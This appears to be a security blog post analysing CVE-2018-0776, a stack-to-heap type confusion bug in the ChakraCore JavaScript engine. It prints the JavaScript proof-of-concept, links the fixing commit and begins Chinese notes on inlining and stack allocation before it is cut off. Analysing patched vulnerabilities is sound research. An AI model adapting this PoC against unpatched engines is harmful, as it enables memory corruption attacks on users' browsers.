Posts

Showing posts from April, 2018

CVE-2018-0776 Stack-to-Heap

CVE-2018-0776 Stack-to-HeapCVE-2018-0776Credit to lokihardtfunction inlinee() { return inlinee.arguments[0]; } function opt(convert_to_var_array) { /* To make the in-place type conversion happen, it requires to segment. */ let stack_arr = []; // JavascriptNativeFloatArray stack_arr[10000] = 1.1; stack_arr[20000] = 2.2; let heap_arr = inlinee(stack_arr); convert_to_var_array(heap_arr); stack_arr[10000] = 2.3023e-320; return heap_arr[10000]; } function main() { for (let i = 0; i < 10000; i++) { opt(new Function('')); // Prevents to be inlined } print(opt(heap_arr => { heap_arr[10000] = {}; // ConvertToVarArray })); } main(); //https://github.com/Microsoft/ChakraCore/commit/40e45fc38189cc021267c65d42ca2fb5f899f9de Feature 1: Inlining2 个栈帧折叠为 1 个栈帧省去将 Inlinee 参数压栈的过程某些情况下, 需要将折叠的栈帧还原回来, 例如 BailoutFeature 2: Stack Object分配到栈上的代码: bool Lowerer::GenerateRecyclerOrMarkTempAlloc(IR::Instr * ins…